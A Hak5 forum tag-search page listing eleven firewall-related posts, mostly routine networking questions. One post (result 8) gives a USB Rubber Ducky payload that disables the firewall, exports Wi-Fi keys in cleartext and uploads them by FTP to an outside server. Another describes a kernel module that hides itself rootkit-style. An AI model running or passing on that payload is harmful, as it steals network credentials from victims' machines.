Jump to content

Search the Community

Showing results for tags 'firewall'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start





Website URL







Enter a five letter word.

Found 11 results

  1. HiddenWall is a Linux kernel module generator for custom rules with netfilter. (block ports, Hidden mode, rootkit functions etc). The motivation: on bad situation, attacker can put your iptables/ufw to fall... but if you have HiddenWall, the attacker will not find the hidden kernel module that block external access, because have a hook to netfilter on kernel land(think like a second layer for firewall). My beginning purpose at this project is protect my personal server, now is protect the machines of my friends. When i talk "friends", i say peoples that don't know how to write low level code. Using the HiddenWall you can generate your custom kernel module for your firewall configuration. The low level programmer can write new templates for modules etc... First step, understand before run Verify if the kernel version is 3.x, 4.x or 5.x: uname -r Clone the repository git clone https://github.com/CoolerVoid/HiddenWall Enter the folder cd HiddenWall/module_generator Edit your firewall rules in directory rules/server.yaml, the python scripts use that file to generate a new firewall module. $ cat rules/server.yaml module_name: SandWall public_ports: 80,443,53 unhide_key: AbraKadabra hide_key: Shazam fake_device_name: usb14 liberate_in_2_out: True whitelist: - machine: ip: open_ports: 22,21 - machine: ip: open_ports: 22 If you want study the static code to generate, look the content at directory "templates". Second step, generate your module If you want generate a kernel module following your YAML file of rules, follow that command: $ python3 WallGen.py --template template/hiddenwall.c -r rules/server.yaml This generate a generic module with rules of server.yaml, if you want to use another template you can use "wall.c", so template module "hiddenwall" have option to run on hidden mode(is not visible to "# lsmod" for example). Third step, install your module To test module: # cd output; make clean; make # insmod SandWall.ko The rule of YAML to generate module is simple, drop all out to in packets, accept ports 80,443 and 53. The machine 192*.181 can connect at ports 22 and 21... if you use nmap at localhost/ you can view the ports open... because rule liberate_in_2_out is true. Password to turn Firewall visible is "AbraKadabra". Password to turn Firewall invisible is "Shazam". You need to send password for your fake device "usb14". To exit module, you need turn visible at "lsmod" command ... # echo "AbraKadabra" > /dev/usb14 # lsmod | grep SandWall # rmmod SandWall Random notes Tested on ubuntu 16 and fedora 29 at kernels "3.x","4.x" and "5.x". TODO Suport to IPV6. Macro to select the interface(to use multiple modes for each interface). Option to remove last logs when turn hide mode. Option to search and remove others toolkits... Code generator to BFP... References Wikipedia Netfilter https://en.wikipedia.org/wiki/Netfilter Linux Device Drivers http://lwn.net/Kernel/LDD3/ M0nad's Diamorphine https://github.com/m0nad/Diamorphine/
  2. Hi Can anyone recommend a GUI based firewall monitoring tool for raspbian please?
  3. Hello, I am new to this form and I work for a school district as a pen tester. We use a firewall called IBoss and we had a student crack it to gain access to otherwise restricted sites and I am not able to recreate how the student worked around the firewall. I need some help on creating a breach within the IBoss system. Thank you Clarence
  4. Anybody use Snort? I consulting on a business that has limited resources so i am looking to cut some cost, as most of the funds were spent upgraded their end user hardware and migrating necessary software to a cloud solution. They are currently using their firewall to do everything routing, DHCP, IDS, VPN and overall network management. A lot of those features require licences yearly, while i have already managed to repurpose some of their switches for internal routing and network management and used one of the left over servers for a DHCP server. I wanted to see if snort would be a viable solution for IDS so that they could have active live alerts not just someone checking the firewall. Thanks
  5. What are some recommended resources for IP blocklists? I just want to block pretty much everyone. The government, big companies, botnets, hackers, etc. Do you have your own blocklist you would like to share?
  6. Hi all, I'm thinking about upgrading my home network with an inline IDS and or Firewall between my modem and router. My home network curently resembles this: If I build a box with a couple of Gigabit network cards and add it into the network at the place shown, and install something like pfsense onto it, can I get the box to just function in a bridge mode between the modem and router? Many thanks all!
  7. Hey! I'm trying to use 2 pineapples to provide wifi for two storeys of the same building (office with roundabout 10-15 persons each). I got them configured, they have access to the internet but they don't relay it to their clients (be it eth or wifi). Any clients connected to a pineapple can ping the pineapple only. traceroutes fail right after the pineapple (tried this for Macs and Win7/8-machines - also for an android phone - except for the traceroute-part of course). - I tried to correct the config files (/etc/config/ network, dhcp, wireless, firewall) - I tried to leave wide open the firewall (which isn't installed on a pineapple, if I understand correctly) - I flushed the iptables (iptables -F) - I tried setting the route: route add default gw to no avail, even with a couple of restarts (barring the iptables which would be reestablished if I understood correctly). I tried a search, but except for this Post of computerchris I couldn't find anything. As I don't have any linux-machines at hand I couldn't start the wp4.sh-file from anywhere and the first of the iptables commands in the quote would give me the error that I may not use the -s parameter twice. The pineapples are connected to a switch (netgear) via ethernet, which in turn leads to the router ( - which also functions as a dsl-modem (Germany - Fritz Box 7390) and a wifi-router (I wanted to install the pineapples to give the network a cleaner layout and have the dsl-modem not do everything - well and also to play around with the pineapples whenever there is a chance ^_^). They can ping to anywhere in the internet, as well as to the dsl-modem. Also they can be reached from any station connected to the dsl-modem (being the wifi-router as well) or connected to the pineapple itself. Because I want to use the pineapples with only the ethernet-cable, I switched the devices in the network-config-file so that wan would lie on the poe-enabled port. The pineapples are supposed to connect to the dsl-router via dhcp and distribute via wifi and the former wan port; (SVR6) and (SVR5). I just received the devices and I tried all day to get them running. I am quite desperate. They run on 3.0 (SVR5) and 2.8.1 (SVR6 - I had to flash one of them as it almost bricked and then would not react to any changes in the config files). Both have the exact same problem. Albeit flashing the iptables and setting the routes I only tried on one of them (SVR5). I will post the config files at the end of the post for one of them (SVR5) and also attach the zip-files with the config-folders of both: SVR5.zip SVR6.zip Here a little map: Internet | DSL-Modem | Switch | \ SVR5 SVR6 | \ clients clients I would like to configure them correctly - in order to have the clients get throught to the internet - to have a deeper understanding of the inner workings of openwrt and the pineapples I don't get anywhere on my own anymore. Please help and inform me about my mistakes. I am eager to learn =D contents of /etc/config/ network wireless dhcp firewall
  8. OK rebuild of my first script. It would not export cleartext passwords without administrator access, and the firewall was also giving me fits. sooooooo. the first ctrl-shift enter gets a cmd shell with administrative access (you need to compile with version 2.2 of duck encoder - props to Dnucna). the first string then disables the firewall, then the rest of the code works fine. You may want to tweek the delay after the ftp session depending on upload speed.....enjoy Please let me know if you have ideas for additions/improvements. DELAY 2000 ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 CTRL-SHIFT ENTER DELAY 400 STRING netsh firewall set opmode mode=disable ENTER DELAY 400 STRING netsh wlan export profile key=clear ENTER DELAY 400 STRING cd %USERPROFILE% ENTER DELAY 400 STRING ftp -i ftp server ENTER DELAY 400 STRING username ENTER DELAY 400 STRING password ENTER DELAY 600 STRING prompt ENTER DELAY 400 STRING prompt ENTER DELAY 400 STRING MPUT *.xml ENTER DELAY 4000 STRING bye ENTER DELAY 400 STRING del *.xml ENTER DELAY 200 STRING netsh firewall set opmode mode=enable ENTER DELAY 400 ALT SPACE STRING c
  9. I'm trying to set up my pineapple MK4 (running 2.7.0) to be able to filter certain tcp ports on a bridge interface. I am able to do this same thing on my laptop running 12.04 ubuntu between two interface cards, but I can't seem to get it to work on the MK4. I realize the below steps are not persistant on a reboot as this is only a POC I am trying to achieve. The steps I take on the MK4: - I edit /etc/sysctl.conf and reboot the MK4 (I read this in another forum and have tried it both ways (with '1' or '0' -default) net.bride.bridge-nf-call-iptables=1 - I create a new bridge and add eth1 brctl addbr br0 ifconfig eth1 promisc up brctl addif br0 eth1 - I delete the pineapple exsisitng bridge and add eth0 to the new bridge ifconfig br-lan down ifconfig eth0 down brctl delbr br-lan ifconfig eth0 promisc up brctl addif br0 eth0 - I bring up the bridge ifconfig br0 netmask up At this point traffic goes through the bridge between eth0 and eth1 (which is good) but I want to be able to filter the forwarding traffic via iptables. - so I add this to the iptables flush them iptables -X iptables -F add filter iptables -A FORWARD -p tcp --dport 80 -j DROP but it still continues to forward port 80 (or any port I put in) I have also tried iptables -A FORWARD -j DROP and it still continues to forward everything. If I do this on INPUT or OUTPUT it does work as I expect it to. What am I missing? I understand that bridge is layer 2 while iptables are layer 3 but I have read that "bridge-nf-call" (I have no idea what I am talking about) takes care of this. Do I need to install additional iptables packages maybe? Thanks in advance for any advice you may have. magoo
  10. I'm trying to "hide" the fact that SSH + deluge are running when port scanned. I think my options are I can firewall the server, open SSH port and keep it visible, and get to the deluge by going to localhost:8112 after a ssh -D $someport. Or, I can use knockknock and hide SSH and Deluge but need to keep 1outbound+1inbound tcp port open for deluge xfers (or use knockknock-proxy). - Server(s) running Ubuntu 10.10 --> 12.04 - knockknock --> http://www.thoughtcr...are/knockknock/ - SSH - deluge-torrent.org/ 1. Has anyone on the forums attempted to setup port knocking with knockknock before? 2. Am I correct in assuming that it would be wise to NOT use UFW to configure my firewall and instead rely strictly on iptables? I believe this to be true because knockknock will need custom iptable entries to work. 3. SSH seems simple to think through. Knock on one port and connect. All Inbound+Outbound traffic flows over one port after the connection is established -- easy enough. 4. I threw in an application like Deluge because I can't get my head around the firewall logic. "deluged" runs as a local daemon on the server. Once a Torrent is added it needs two ports to operate (1 Inbound + 1 Outbound). "deluge-web --fork" is a web gui to add/remove Torrents. It runs on a separate port (8112 by default), for a total of three. My best guess is to create a knockknock rule for the web gui (8112) and leave deluge's inbound (5000) + outbound (6000) ports open and standard SSH knockknock rule. OR should I use the knockknock-proxy? Can anyone contribute/comment on how this should be setup? THANKS
  11. Ho can make the iptable entries in to a startup script for jasager? How do I create 2 scripts, one for WAN port routing and 1 for Android USB Tethering? iptables -A FORWARD -i eth1 -o wlan0 -s -m state --state NEW -j ACCEPT iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT iptables -t nat -A POSTROUTING -o eth1 -j MASQUERADE iptables -A FORWARD -s -o usb0 -j ACCEPT iptables -A FORWARD -d -m state --state ESTABLISHED,RELATED -i usb0 -j ACCEPT iptables -t nat -A POSTROUTING -s -o usb0 -j MASQUERADE Thnks
  • Create New...